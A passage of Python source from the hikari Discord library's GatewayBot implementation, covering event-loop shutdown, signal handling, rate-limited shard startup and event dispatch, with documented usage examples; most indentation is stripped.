from hikari.impl import event_factory as event_factory_impl
from hikari.impl import event_manager as event_manager_impl
from hikari.impl import rest as rest_impl
from hikari.impl import shard as shard_impl
from hikari.impl import voice as voice_impl
from hikari.internal import aio
from hikari.internal import time
from hikari.internal import ux
if typing.TYPE_CHECKING:
import concurrent.futures
from hikari import channels
from hikari import guilds
from hikari import users as users_
from hikari.api import cache as cache_
from hikari.api import entity_factory as entity_factory_
from hikari.api import event_factory as event_factory_
from hikari.api import event_manager as event_manager_
from hikari.api import rest as rest_
from hikari.api import shard as gateway_shard
from hikari.api import voice as voice_
_LOGGER: typing.Final[logging.Logger] = logging.getLogger("hikari.bot")
async def _gather(coros: typing.Iterator[typing.Awaitable[typing.Any]]) -> None:
# Calling asyncio.gather outside of a running event loop isn't safe and
# will lead to RuntimeErrors in later versions of python, so this call is
# kept within a coroutine function.
await asyncio.gather(*coros)
def _destroy_loop(loop: asyncio.AbstractEventLoop) -> None:
async def murder(future: asyncio.Future[typing.Any]) -> None:
# These include _GatheringFuture which must be awaited if the children
# throw an asyncio.CancelledError, otherwise it will spam logs with warnings
# about exceptions not being retrieved before GC.
try:
_LOGGER.log(ux.TRACE, "killing %s", future)
future.cancel()
await future
except asyncio.CancelledError:
pass
except Exception as ex:
loop.call_exception_handler(
{
"message": "Future raised unexpected exception after requesting cancellation",
"exception": ex,
"future": future,
}
)
remaining_tasks = [t for t in asyncio.all_tasks(loop) if not t.done()]
if remaining_tasks:
_LOGGER.debug("terminating %s remaining tasks forcefully", len(remaining_tasks))
loop.run_until_complete(_gather((murder(task) for task in remaining_tasks)))
else:
_LOGGER.debug("No remaining tasks exist, good job!")
if sys.version_info >= (3, 9):
_LOGGER.debug("shutting down default executor")
try:
# This seems to raise a NotImplementedError when running with uvloop.
loop.run_until_complete(loop.shutdown_default_executor())
except NotImplementedError:
pass
_LOGGER.debug("shutting down asyncgens")
loop.run_until_complete(loop.shutdown_asyncgens())
_LOGGER.debug("closing event loop")
loop.close()
# Closed loops cannot be re-used so it should also be un-set.
asyncio.set_event_loop(None)
def _validate_activity(activity: undefined.UndefinedNoneOr[presences.Activity]) -> None:
    # This seems to cause confusion for a lot of people, so let's add some warnings into the mix.
if activity is undefined.UNDEFINED or activity is None:
return
# If you ever change where this is called from, make sure to check the stacklevels are correct
# or the code preview in the warning will be wrong...
if activity.type is presences.ActivityType.CUSTOM:
warnings.warn(
"The CUSTOM activity type is not supported by bots at the time of writing, and may therefore not have "
"any effect if used.",
category=errors.HikariWarning,
stacklevel=3,
)
elif activity.type is presences.ActivityType.STREAMING and activity.url is None:
warnings.warn(
"The STREAMING activity type requires a 'url' parameter pointing to a valid Twitch or YouTube video "
"URL to be specified on the activity for the presence update to have any effect.",
category=errors.HikariWarning,
stacklevel=3,
)
class GatewayBot(traits.GatewayBotAware):
"""Basic auto-sharding bot implementation.
This is the class you will want to use to start, control, and build a bot
with.
Parameters
----------
token : builtins.str
The bot token to sign in with.
Other Parameters
----------------
allow_color : builtins.bool
Defaulting to `builtins.True`, this will enable coloured console logs
on any platform that is a TTY.
Setting a `"CLICOLOR"` environment variable to any **non `0`** value
will override this setting.
        Users should consider this advice to the application on whether it is
        safe to show colours or not. Since some terminals can be
awkward or not support features in a standard way, the option to
explicitly disable this is provided. See `force_color` for an
alternative.
banner : typing.Optional[builtins.str]
The package to search for a `banner.txt` in. Defaults to `"hikari"` for
the `"hikari/banner.txt"` banner.
Setting this to `builtins.None` will disable the banner being shown.
executor : typing.Optional[concurrent.futures.Executor]
Defaults to `builtins.None`. If non-`builtins.None`, then this executor
is used instead of the `concurrent.futures.ThreadPoolExecutor` attached
to the `asyncio.AbstractEventLoop` that the bot will run on. This
executor is used primarily for file-IO.
While mainly supporting the `concurrent.futures.ThreadPoolExecutor`
implementation in the standard lib, Hikari's file handling systems
should also work with `concurrent.futures.ProcessPoolExecutor`, which
relies on all objects used in IPC to be `pickle`able. Many third-party
libraries will not support this fully though, so your mileage may vary
on using ProcessPoolExecutor implementations with this parameter.
force_color : builtins.bool
Defaults to `builtins.False`. If `builtins.True`, then this application
will __force__ colour to be used in console-based output. Specifying a
`"CLICOLOR_FORCE"` environment variable with a non-`"0"` value will
override this setting.
cache_settings : typing.Optional[hikari.impl.config.CacheSettings]
Optional cache settings. If unspecified, will use the defaults.
http_settings : typing.Optional[hikari.impl.config.HTTPSettings]
Optional custom HTTP configuration settings to use. Allows you to
customise functionality such as whether SSL-verification is enabled,
what timeouts `aiohttp` should expect to use for requests, and behavior
regarding HTTP-redirects.
intents : hikari.intents.Intents
Defaults to `hikari.intents.Intents.ALL_UNPRIVILEGED`. This allows you
to change which intents your application will use on the gateway. This
can be used to control and change the types of events you will receive.
logs : typing.Union[builtins.None, LoggerLevel, typing.Dict[str, typing.Any]]
Defaults to `"INFO"`.
If `builtins.None`, then the Python logging system is left uninitialized
on startup, and you will need to configure it manually to view most
logs that are output by components of this library.
If one of the valid values in a `LoggerLevel`, then this will match a
call to `colorlog.basicConfig` (a facade for `logging.basicConfig` with
additional conduit for enabling coloured logging levels) with the
`level` kwarg matching this value.
If a `typing.Dict[str, typing.Any]` equivalent, then this value is
passed to `logging.config.dictConfig` to allow the user to provide a
specialized logging configuration of their choice. If any handlers are
defined in the dict, default handlers will not be setup.
As a side note, you can always opt to leave this on the default value
and then use an incremental `logging.config.dictConfig` that applies
any additional changes on top of the base configuration, if you prefer.
        An example of this can be found in the `Example` section.
Note that `"TRACE_HIKARI"` is a library-specific logging level
which is expected to be more verbose than `"DEBUG"`.
max_rate_limit : builtins.float
The max number of seconds to backoff for when rate limited. Anything
greater than this will instead raise an error.
This defaults to five minutes if left to the default value. This is to
stop potentially indefinitely waiting on an endpoint, which is almost
never what you want to do if giving a response to a user.
You can set this to `float("inf")` to disable this check entirely.
Note that this only applies to the REST API component that communicates
with Discord, and will not affect sharding or third party HTTP endpoints
that may be in use.
max_retries : typing.Optional[builtins.int]
Maximum number of times a request will be retried if
it fails with a `5xx` status. Defaults to 3 if set to `builtins.None`.
proxy_settings : typing.Optional[hikari.impl.config.ProxySettings]
Custom proxy settings to use with network-layer logic
in your application to get through an HTTP-proxy.
rest_url : typing.Optional[builtins.str]
Defaults to the Discord REST API URL if `builtins.None`. Can be
overridden if you are attempting to point to an unofficial endpoint, or
if you are attempting to mock/stub the Discord API for any reason.
Generally you do not want to change this.
!!! note
`force_color` will always take precedence over `allow_color`.
!!! note
Settings that control the gateway session are provided to the
`GatewayBot.run` and `GatewayBot.start` functions in this class. This is done
to allow you to contextually customise details such as sharding
configuration without having to re-initialize the entire application
each time.
Example
-------
Setting up logging using a dictionary configuration:
```py
import os
import hikari
# We want to make gateway logs output as DEBUG, and TRACE for all ratelimit content.
bot = hikari.GatewayBot(
token=os.environ["BOT_TOKEN"],
logs={
"version": 1,
"incremental": True,
"loggers": {
"hikari.gateway": {"level": "DEBUG"},
"hikari.ratelimits": {"level": "TRACE_HIKARI"},
},
},
)
```
"""
__slots__: typing.Sequence[str] = (
"_cache",
"_closing_event",
"_closed_event",
"_entity_factory",
"_event_manager",
"_event_factory",
"_executor",
"_http_settings",
"_intents",
"_is_alive",
"_proxy_settings",
"_rest",
"_shards",
"_token",
"_voice",
"shards",
)
def __init__(
self,
token: str,
*,
allow_color: bool = True,
banner: typing.Optional[str] = "hikari",
executor: typing.Optional[concurrent.futures.Executor] = None,
force_color: bool = False,
cache_settings: typing.Optional[config_impl.CacheSettings] = None,
http_settings: typing.Optional[config_impl.HTTPSettings] = None,
intents: intents_.Intents = intents_.Intents.ALL_UNPRIVILEGED,
logs: typing.Union[None, int, str, typing.Dict[str, typing.Any]] = "INFO",
max_rate_limit: float = 300,
max_retries: int = 3,
proxy_settings: typing.Optional[config_impl.ProxySettings] = None,
rest_url: typing.Optional[str] = None,
) -> None:
# Beautification and logging
ux.init_logging(logs, allow_color, force_color)
self.print_banner(banner, allow_color, force_color)
# Settings and state
self._closing_event: typing.Optional[asyncio.Event] = None
self._closed_event: typing.Optional[asyncio.Event] = None
self._is_alive = False
self._executor = executor
self._http_settings = http_settings if http_settings is not None else config_impl.HTTPSettings()
self._intents = intents
self._proxy_settings = proxy_settings if proxy_settings is not None else config_impl.ProxySettings()
self._token = token.strip()
# Caching
cache_settings = cache_settings if cache_settings is not None else config_impl.CacheSettings()
self._cache = cache_impl.CacheImpl(self, cache_settings)
# Entity creation
self._entity_factory = entity_factory_impl.EntityFactoryImpl(self)
# Event creation
self._event_factory = event_factory_impl.EventFactoryImpl(self)
# Event handling
self._event_manager = event_manager_impl.EventManagerImpl(self._event_factory, self._intents, cache=self._cache)
# Voice subsystem
self._voice = voice_impl.VoiceComponentImpl(self)
# RESTful API.
self._rest = rest_impl.RESTClientImpl(
cache=self._cache,
entity_factory=self._entity_factory,
executor=self._executor,
http_settings=self._http_settings,
max_rate_limit=max_rate_limit,
proxy_settings=self._proxy_settings,
rest_url=rest_url,
max_retries=max_retries,
token=token,
token_type=applications.TokenType.BOT,
)
# We populate these on startup instead, as we need to possibly make some
# HTTP requests to determine what to put in this mapping.
self._shards: typing.Dict[int, gateway_shard.GatewayShard] = {}
self.shards: typing.Mapping[int, gateway_shard.GatewayShard] = types.MappingProxyType(self._shards)
@property
def cache(self) -> cache_.Cache:
return self._cache
@property
def event_manager(self) -> event_manager_.EventManager:
return self._event_manager
@property
def entity_factory(self) -> entity_factory_.EntityFactory:
return self._entity_factory
@property
def event_factory(self) -> event_factory_.EventFactory:
return self._event_factory
@property
def executor(self) -> typing.Optional[concurrent.futures.Executor]:
return self._executor
@property
def heartbeat_latencies(self) -> typing.Mapping[int, float]:
return {s.id: s.heartbeat_latency for s in self._shards.values()}
@property
def heartbeat_latency(self) -> float:
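        # Mean heartbeat latency across all shards, ignoring shards whose
        # latency is still float("nan") (no heartbeat has been measured yet).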
latencies = [s.heartbeat_latency for s in self._shards.values() if not math.isnan(s.heartbeat_latency)]
return sum(latencies) / len(latencies) if latencies else float("nan")
@property
def http_settings(self) -> config_impl.HTTPSettings:
return self._http_settings
@property
def intents(self) -> intents_.Intents:
return self._intents
@property
def proxy_settings(self) -> config_impl.ProxySettings:
return self._proxy_settings
@property
def shard_count(self) -> int:
return next(iter(self._shards.values())).shard_count if self._shards else 0
@property
def voice(self) -> voice_.VoiceComponent:
return self._voice
@property
def rest(self) -> rest_.RESTClient:
return self._rest
@property
def is_alive(self) -> bool:
return self._is_alive
def _check_if_alive(self) -> None:
if not self._is_alive:
raise errors.ComponentStateConflictError("bot is not running so it cannot be interacted with")
def get_me(self) -> typing.Optional[users_.OwnUser]:
return self._cache.get_me()
async def close(self) -> None:
self._check_if_alive()
await self._close()
async def _close(self) -> None:
if self._closed_event: # Closing is in progress from another call, wait for that to complete.
await self._closed_event.wait()
return
if self._closing_event is None: # If closing event is None then this is already closed.
return
_LOGGER.debug("bot requested to shutdown")
self._closed_event = asyncio.Event()
self._closing_event.set()
self._closing_event = None
dispatch_events = self._is_alive
loop = asyncio.get_running_loop()
async def handle(name: str, awaitable: typing.Awaitable[typing.Any]) -> None:
future = asyncio.ensure_future(awaitable)
try:
await future
except Exception as ex:
loop.call_exception_handler(
{
"message": f"{name} raised an exception during shutdown",
"future": future,
"exception": ex,
}
)
if dispatch_events:
await self._event_manager.dispatch(self._event_factory.deserialize_stopping_event())
_LOGGER.log(ux.TRACE, "StoppingEvent dispatch completed, now beginning termination")
calls = [
("rest", self._rest.close()),
("voice handler", self._voice.close()),
*((f"shard {s.id}", s.close()) for s in self._shards.values()),
]
for coro in asyncio.as_completed([handle(*pair) for pair in calls]):
await coro
# Clear out cache and shard map
self._cache.clear()
self._shards.clear()
self._is_alive = False
if dispatch_events:
await self._event_manager.dispatch(self._event_factory.deserialize_stopped_event())
self._closed_event.set()
self._closed_event = None
def dispatch(self, event: event_manager_.EventT_inv) -> asyncio.Future[typing.Any]:
"""Dispatch an event.
Parameters
----------
event : hikari.events.base_events.Event
The event to dispatch.
Example
-------
We can dispatch custom events by first defining a class that
derives from `hikari.events.base_events.Event`.
```py
import attr
from hikari.traits import RESTAware
from hikari.events.base_events import Event
from hikari.users import User
from hikari.snowflakes import Snowflake
@attr.define()
class EveryoneMentionedEvent(Event):
app: RESTAware = attr.field()
author: User = attr.field()
'''The user who mentioned everyone.'''
content: str = attr.field()
'''The message that was sent.'''
message_id: Snowflake = attr.field()
'''The message ID.'''
channel_id: Snowflake = attr.field()
'''The channel ID.'''
```
We can then dispatch our event as we see fit.
```py
from hikari.events.messages import MessageCreateEvent
@bot.listen(MessageCreateEvent)
async def on_message(event):
if "@everyone" in event.content or "@here" in event.content:
                event = EveryoneMentionedEvent(
                    app=event.app,
                    author=event.author,
                    content=event.content,
                    message_id=event.message_id,
                    channel_id=event.channel_id,
)
bot.dispatch(event)
```
This event can be listened to elsewhere by subscribing to it with
`EventManager.subscribe`.
```py
@bot.listen(EveryoneMentionedEvent)
async def on_everyone_mentioned(event):
            print(event.author, "just pinged everyone in", event.channel_id)
```
Returns
-------
asyncio.Future[typing.Any]
A future that can be optionally awaited. If awaited, the future
will complete once all corresponding event listeners have been
invoked. If not awaited, this will schedule the dispatch of the
events in the background for later.
See Also
--------
Listen: `hikari.impl.bot.GatewayBot.listen`
Stream: `hikari.impl.bot.GatewayBot.stream`
Subscribe: `hikari.impl.bot.GatewayBot.subscribe`
Unsubscribe: `hikari.impl.bot.GatewayBot.unsubscribe`
Wait_for: `hikari.impl.bot.GatewayBot.wait_for`
"""
return self._event_manager.dispatch(event)
def get_listeners(
self, event_type: typing.Type[event_manager_.EventT_co], /, *, polymorphic: bool = True
) -> typing.Collection[event_manager_.CallbackT[event_manager_.EventT_co]]:
"""Get the listeners for a given event type, if there are any.
Parameters
----------
event_type : typing.Type[T]
The event type to look for.
`T` must be a subclass of `hikari.events.base_events.Event`.
polymorphic : builtins.bool
If `builtins.True`, this will also return the listeners of the
subclasses of the given event type. If `builtins.False`, then
only listeners for this class specifically are returned. The
default is `builtins.True`.
Returns
-------
        typing.Collection[typing.Callable[[T], typing.Coroutine[typing.Any, typing.Any, builtins.None]]]
A copy of the collection of listeners for the event. Will return
an empty collection if nothing is registered.
`T` must be a subclass of `hikari.events.base_events.Event`.
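        Example
        -------
        A small inspection sketch:
        ```py
        from hikari.events.messages import MessageCreateEvent
        listeners = bot.get_listeners(MessageCreateEvent, polymorphic=False)
        print(f"{len(listeners)} listener(s) registered")
        ```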
"""
return self._event_manager.get_listeners(event_type, polymorphic=polymorphic)
async def join(self, until_close: bool = True) -> None:
self._check_if_alive()
awaitables: typing.List[typing.Awaitable[typing.Any]] = [s.join() for s in self._shards.values()]
if until_close and self._closing_event: # If closing event is None then this is already closing.
awaitables.append(self._closing_event.wait())
await aio.first_completed(*awaitables)
def listen(
self, event_type: typing.Optional[typing.Type[event_manager_.EventT_co]] = None
) -> typing.Callable[
[event_manager_.CallbackT[event_manager_.EventT_co]],
event_manager_.CallbackT[event_manager_.EventT_co],
]:
"""Generate a decorator to subscribe a callback to an event type.
This is a second-order decorator.
Parameters
----------
event_type : typing.Optional[typing.Type[T]]
The event type to subscribe to. The implementation may allow this
to be undefined. If this is the case, the event type will be inferred
instead from the type hints on the function signature.
`T` must be a subclass of `hikari.events.base_events.Event`.
Returns
-------
typing.Callable[[T], T]
A decorator for a coroutine function that passes it to
`EventManager.subscribe` before returning the function
reference.
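        Example
        -------
        A short sketch; with no explicit event type, the type is inferred
        from the parameter annotation:
        ```py
        from hikari.events.messages import MessageCreateEvent
        @bot.listen()
        async def on_message(event: MessageCreateEvent) -> None:
            ...
        ```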
See Also
--------
Dispatch: `hikari.impl.bot.GatewayBot.dispatch`
Stream: `hikari.impl.bot.GatewayBot.stream`
Subscribe: `hikari.impl.bot.GatewayBot.subscribe`
Unsubscribe: `hikari.impl.bot.GatewayBot.unsubscribe`
Wait_for: `hikari.impl.bot.GatewayBot.wait_for`
"""
return self._event_manager.listen(event_type)
@staticmethod
def print_banner(
banner: typing.Optional[str],
allow_color: bool,
force_color: bool,
extra_args: typing.Optional[typing.Dict[str, str]] = None,
) -> None:
"""Print the banner.
This allows library vendors to override this behaviour, or choose to
inject their own "branding" on top of what hikari provides by default.
Normal users should not need to invoke this function, and can simply
change the `banner` argument passed to the constructor to manipulate
what is displayed.
Parameters
----------
banner : typing.Optional[builtins.str]
The package to find a `banner.txt` in.
allow_color : builtins.bool
A flag that allows advising whether to allow color if supported or
not. Can be overridden by setting a `"CLICOLOR"` environment
variable to a non-`"0"` string.
force_color : builtins.bool
A flag that allows forcing color to always be output, even if the
terminal device may not support it. Setting the `"CLICOLOR_FORCE"`
environment variable to a non-`"0"` string will override this.
!!! note
`force_color` will always take precedence over `allow_color`.
extra_args : typing.Optional[typing.Dict[builtins.str, builtins.str]]
If provided, extra $-substitutions to use when printing the banner.
Default substitutions can not be overwritten.
Raises
------
builtins.ValueError
If `extra_args` contains a default $-substitution.
"""
ux.print_banner(banner, allow_color, force_color, extra_args=extra_args)
def run(
self,
*,
activity: typing.Optional[presences.Activity] = None,
afk: bool = False,
asyncio_debug: typing.Optional[bool] = None,
check_for_updates: bool = True,
close_passed_executor: bool = False,
close_loop: bool = True,
coroutine_tracking_depth: typing.Optional[int] = None,
enable_signal_handlers: typing.Optional[bool] = None,
idle_since: typing.Optional[datetime.datetime] = None,
ignore_session_start_limit: bool = False,
large_threshold: int = 250,
propagate_interrupts: bool = False,
status: presences.Status = presences.Status.ONLINE,
shard_ids: typing.Optional[typing.AbstractSet[int]] = None,
shard_count: typing.Optional[int] = None,
) -> None:
"""Start the bot, wait for all shards to become ready, and then return.
Other Parameters
----------------
activity : typing.Optional[hikari.presences.Activity]
The initial activity to display in the bot user presence, or
`builtins.None` (default) to not show any.
afk : builtins.bool
The initial AFK state to display in the bot user presence, or
`builtins.False` (default) to not show any.
asyncio_debug : builtins.bool
Defaults to `builtins.False`. If `builtins.True`, then debugging is
enabled for the asyncio event loop in use.
check_for_updates : builtins.bool
Defaults to `builtins.True`. If `builtins.True`, will check for
newer versions of `hikari` on PyPI and notify if available.
close_passed_executor : builtins.bool
Defaults to `builtins.False`. If `builtins.True`, any custom
`concurrent.futures.Executor` passed to the constructor will be
shut down when the application terminates. This does not affect the
default executor associated with the event loop, and will not
do anything if you do not provide a custom executor to the
constructor.
close_loop : builtins.bool
Defaults to `builtins.True`. If `builtins.True`, then once the bot
enters a state where all components have shut down permanently
during application shutdown, then all asyncgens and background tasks
will be destroyed, and the event loop will be shut down.
This will wait until all `hikari`-owned `aiohttp` connectors have
had time to attempt to shut down correctly (around 250ms), and on
Python 3.9 and newer, will also shut down the default event loop
executor too.
coroutine_tracking_depth : typing.Optional[builtins.int]
Defaults to `builtins.None`. If an integer value and supported by
the interpreter, then this many nested coroutine calls will be
tracked with their call origin state. This allows you to determine
where non-awaited coroutines may originate from, but generally you
do not want to leave this enabled for performance reasons.
enable_signal_handlers : typing.Optional[builtins.bool]
Defaults to `builtins.True` if this is started in the main thread.
If on a __non-Windows__ OS with builtin support for kernel-level
POSIX signals, then setting this to `builtins.True` will allow
treating keyboard interrupts and other OS signals to safely shut
down the application as calls to shut down the application properly
rather than just killing the process in a dirty state immediately.
You should leave this enabled unless you plan to implement your own
signal handling yourself.
idle_since : typing.Optional[datetime.datetime]
The `datetime.datetime` the user should be marked as being idle
since, or `builtins.None` (default) to not show this.
ignore_session_start_limit : builtins.bool
Defaults to `builtins.False`. If `builtins.False`, then attempting
to start more sessions than you are allowed in a 24 hour window
will throw a `hikari.errors.GatewayError` rather than going ahead
and hitting the IDENTIFY limit, which may result in your token
being reset. Setting to `builtins.True` disables this behavior.
large_threshold : builtins.int
Threshold for members in a guild before it is treated as being
"large" and no longer sending member details in the `GUILD CREATE`
event. Defaults to `250`.
propagate_interrupts : builtins.bool
Defaults to `builtins.False`. If set to `builtins.True`, then any
            internal `hikari.errors.HikariInterrupt` that is raised as a
result of catching an OS level signal will result in the
exception being rethrown once the application has closed. This can
allow you to use hikari signal handlers and still be able to
determine what kind of interrupt the application received after
it closes. When `builtins.False`, nothing is raised and the call
will terminate cleanly and silently where possible instead.
shard_ids : typing.Optional[typing.AbstractSet[builtins.int]]
The shard IDs to create shards for. If not `builtins.None`, then
a non-`None` `shard_count` must ALSO be provided. Defaults to
`builtins.None`, which means the Discord-recommended count is used
for your application instead.
shard_count : typing.Optional[builtins.int]
The number of shards to use in the entire distributed application.
Defaults to `builtins.None` which results in the count being
determined dynamically on startup.
status : hikari.presences.Status
The initial status to show for the user presence on startup.
Defaults to `hikari.presences.Status.ONLINE`.
Raises
------
hikari.errors.ComponentStateConflictError
If bot is already running.
builtins.TypeError
If `shard_ids` is passed without `shard_count`.
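        Example
        -------
        A minimal start-up sketch (the keyword values shown are illustrative,
        not defaults):
        ```py
        from hikari import presences
        bot.run(
            status=presences.Status.IDLE,
            large_threshold=100,
        )
        ```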
"""
if self._is_alive:
raise errors.ComponentStateConflictError("bot is already running")
if shard_ids is not None and shard_count is None:
raise TypeError("'shard_ids' must be passed with 'shard_count'")
loop = aio.get_or_make_loop()
signals = ("SIGINT", "SIGTERM")
if asyncio_debug:
loop.set_debug(True)
if coroutine_tracking_depth is not None:
try:
# Provisionally defined in CPython, may be removed without notice.
sys.set_coroutine_origin_tracking_depth(coroutine_tracking_depth)
except AttributeError:
_LOGGER.log(ux.TRACE, "cannot set coroutine tracking depth for sys, no functionality exists for this")
        # Throwing this in the handler will lead to lots of fun OS specific shenanigans. So, let's just
        # cache it for later, I guess.
interrupt: typing.Optional[errors.HikariInterrupt] = None
loop_thread_id = threading.get_native_id()
def handle_os_interrupt(signum: int, frame: typing.Optional[types.FrameType]) -> None:
# If we use a POSIX system, then raising an exception in here works perfectly and shuts the loop down
# with an exception, which is good.
# Windows, however, is special on this front. On Windows, the exception is caught by whatever was
# currently running on the event loop at the time, which is annoying for us, as this could be fired into
# the task for an event dispatch, for example, which is a guarded call that is never waited for by design.
# We can't always safely intercept this either, as Windows does not allow us to use asyncio loop
# signal listeners (since Windows doesn't have kernel-level signals, only emulated system calls
# for a remote few standard C signal types). Thus, the best solution here is to set the close bit
# instead, which will let the bot start to clean itself up as if the user closed it manually via a call
# to `bot.close()`.
nonlocal interrupt
signame = signal.strsignal(signum)
assert signame is not None # Will always be True
interrupt = errors.HikariInterrupt(signum, signame)
# The loop may or may not be running, depending on the state of the application when this occurs.
# Signals on POSIX only occur on the main thread usually, too, so we need to ensure this is
# threadsafe if we want the user's application to still shut down if on a separate thread.
# We log native thread IDs purely for debugging purposes.
if _LOGGER.isEnabledFor(ux.TRACE):
_LOGGER.log(
ux.TRACE,
"interrupt %s occurred on thread %s, bot on thread %s will be notified to shut down shortly\n"
"Stacktrace for developer sanity:\n%s",
signum,
threading.get_native_id(),
loop_thread_id,
"".join(traceback.format_stack(frame)),
)
asyncio.run_coroutine_threadsafe(self._set_close_flag(signame, signum), loop)
if enable_signal_handlers is None:
# Signal handlers can only be registered on the main thread so we
# only default to True if this is the case.
enable_signal_handlers = threading.current_thread() is threading.main_thread()
if enable_signal_handlers:
for sig in signals:
try:
signum = getattr(signal, sig)
signal.signal(signum, handle_os_interrupt)
except AttributeError:
_LOGGER.log(ux.TRACE, "signal %s is not implemented on your platform", sig)
try:
loop.run_until_complete(
self.start(
activity=activity,
afk=afk,
check_for_updates=check_for_updates,
idle_since=idle_since,
ignore_session_start_limit=ignore_session_start_limit,
large_threshold=large_threshold,
shard_ids=shard_ids,
shard_count=shard_count,
status=status,
)
)
loop.run_until_complete(self.join())
finally:
try:
loop.run_until_complete(self._close())
if close_passed_executor and self._executor is not None:
_LOGGER.debug("shutting down executor %s", self._executor)
self._executor.shutdown(wait=True)
self._executor = None
finally:
if enable_signal_handlers:
for sig in signals:
try:
signum = getattr(signal, sig)
signal.signal(signum, signal.SIG_DFL)
except AttributeError:
# Signal not implemented probably. We should have logged this earlier.
pass
if close_loop:
_destroy_loop(loop)
_LOGGER.info("successfully terminated")
if propagate_interrupts and interrupt is not None:
raise interrupt
async def start(
self,
*,
activity: typing.Optional[presences.Activity] = None,
afk: bool = False,
check_for_updates: bool = True,
idle_since: typing.Optional[datetime.datetime] = None,
ignore_session_start_limit: bool = False,
large_threshold: int = 250,
shard_ids: typing.Optional[typing.AbstractSet[int]] = None,
shard_count: typing.Optional[int] = None,
status: presences.Status = presences.Status.ONLINE,
) -> None:
"""Start the bot, wait for all shards to become ready, and then return.
Other Parameters
----------------
activity : typing.Optional[hikari.presences.Activity]
The initial activity to display in the bot user presence, or
`builtins.None` (default) to not show any.
afk : builtins.bool
The initial AFK state to display in the bot user presence, or
`builtins.False` (default) to not show any.
check_for_updates : builtins.bool
Defaults to `builtins.True`. If `builtins.True`, will check for
newer versions of `hikari` on PyPI and notify if available.
idle_since : typing.Optional[datetime.datetime]
The `datetime.datetime` the user should be marked as being idle
since, or `builtins.None` (default) to not show this.
ignore_session_start_limit : builtins.bool
Defaults to `builtins.False`. If `builtins.False`, then attempting
to start more sessions than you are allowed in a 24 hour window
will throw a `hikari.errors.GatewayError` rather than going ahead
and hitting the IDENTIFY limit, which may result in your token
being reset. Setting to `builtins.True` disables this behavior.
large_threshold : builtins.int
Threshold for members in a guild before it is treated as being
"large" and no longer sending member details in the `GUILD CREATE`
event. Defaults to `250`.
shard_ids : typing.Optional[typing.AbstractSet[builtins.int]]
The shard IDs to create shards for. If not `builtins.None`, then
a non-`None` `shard_count` must ALSO be provided. Defaults to
`builtins.None`, which means the Discord-recommended count is used
for your application instead.
shard_count : typing.Optional[builtins.int]
The number of shards to use in the entire distributed application.
Defaults to `builtins.None` which results in the count being
determined dynamically on startup.
status : hikari.presences.Status
The initial status to show for the user presence on startup.
Defaults to `hikari.presences.Status.ONLINE`.
Raises
------
hikari.errors.ComponentStateConflictError
If bot is already running.
builtins.TypeError
If `shard_ids` is passed without `shard_count`.
"""
if self._is_alive:
raise errors.ComponentStateConflictError("bot is already running")
if shard_ids is not None and shard_count is None:
raise TypeError("'shard_ids' must be passed with 'shard_count'")
_validate_activity(activity)
start_time = time.monotonic()
self._rest.start()
self._voice.start()
self._closing_event = asyncio.Event()
self._is_alive = True
if check_for_updates:
asyncio.create_task(
ux.check_for_updates(self._http_settings, self._proxy_settings),
name="check for package updates",
)
requirements = await self._rest.fetch_gateway_bot_info()
await self._event_manager.dispatch(self._event_factory.deserialize_starting_event())
if shard_count is None:
shard_count = requirements.shard_count
if shard_ids is None:
shard_ids = set(range(shard_count))
if requirements.session_start_limit.remaining < len(shard_ids) and not ignore_session_start_limit:
_LOGGER.critical(
"would have started %s session%s, but you only have %s session%s remaining until %s. Starting more "
"sessions than you are allowed to start may result in your token being reset. To skip this message, "
"use bot.run(..., ignore_session_start_limit=True) or bot.start(..., ignore_session_start_limit=True)",
len(shard_ids),
"s" if len(shard_ids) != 1 else "",
requirements.session_start_limit.remaining,
"s" if requirements.session_start_limit.remaining != 1 else "",
requirements.session_start_limit.reset_at,
)
raise errors.GatewayError("Attempted to start more sessions than were allowed in the given time-window")
_LOGGER.info(
"you can start %s session%s before the next window which starts at %s; planning to start %s session%s... ",
requirements.session_start_limit.remaining,
"s" if requirements.session_start_limit.remaining != 1 else "",
requirements.session_start_limit.reset_at,
len(shard_ids),
"s" if len(shard_ids) != 1 else "",
)
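        # Shards are started in blocks of max_concurrency (the number of
        # IDENTIFY calls Discord permits per 5-second window); each block is
        # then filtered down to the shard ids that were actually requested.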
for window_start in range(0, shard_count, requirements.session_start_limit.max_concurrency):
window = [
candidate_shard_id
for candidate_shard_id in range(
window_start, window_start + requirements.session_start_limit.max_concurrency
)
if candidate_shard_id in shard_ids
]
if not window:
continue
if self._shards:
close_waiter = asyncio.create_task(self._closing_event.wait())
shard_joiners = [s.join() for s in self._shards.values()]
try:
# Attempt to wait for all started shards, for 5 seconds, along with the close
# waiter.
# If the close flag is set (i.e. user invoked bot.close), or one or more shards
# die in this time, we shut down immediately.
# If we time out, the joining tasks get discarded and we spin up the next
# block of shards, if applicable.
_LOGGER.info("the next startup window is in 5 seconds, please wait...")
await aio.first_completed(aio.all_of(*shard_joiners, timeout=5), close_waiter)
if not close_waiter.cancelled():
_LOGGER.info("requested to shut down during startup of shards")
else:
_LOGGER.critical("one or more shards shut down unexpectedly during bot startup")
return
except asyncio.TimeoutError:
# If any shards stopped silently, we should close.
if any(not s.is_alive for s in self._shards.values()):
_LOGGER.warning("one of the shards has been manually shut down (no error), will now shut down")
await self._close()
return
# new window starts.
except Exception as ex:
_LOGGER.critical("an exception occurred in one of the started shards during bot startup: %r", ex)
raise
await aio.all_of(
*(
self._start_one_shard(
activity=activity,
afk=afk,
idle_since=idle_since,
status=status,
large_threshold=large_threshold,
shard_id=candidate_shard_id,
shard_count=shard_count,
url=requirements.url,
closing_event=self._closing_event,
)
for candidate_shard_id in window
if candidate_shard_id in shard_ids
)
)
await self._event_manager.dispatch(self._event_factory.deserialize_started_event())
_LOGGER.info("started successfully in approx %.2f seconds", time.monotonic() - start_time)
def stream(
self,
event_type: typing.Type[event_manager_.EventT_co],
/,
timeout: typing.Union[float, int, None],
limit: typing.Optional[int] = None,
) -> event_manager_.EventStream[event_manager_.EventT_co]:
"""Return a stream iterator for the given event and sub-events.
Parameters
----------
event_type : typing.Type[hikari.events.base_events.Event]
The event type to listen for. This will listen for subclasses of
this type additionally.
timeout : typing.Optional[builtins.int, builtins.float]
How long this streamer should wait for the next event before
ending the iteration. If `builtins.None` then this will continue
until explicitly broken from.
limit : typing.Optional[builtins.int]
The limit for how many events this should queue at one time before
dropping extra incoming events, leave this as `builtins.None` for
the cache size to be unlimited.
Returns
-------
EventStream[hikari.events.base_events.Event]
The async iterator to handle streamed events. This must be started
with `with stream:` or `stream.open()` before
asynchronously iterating over it.
!!! warning
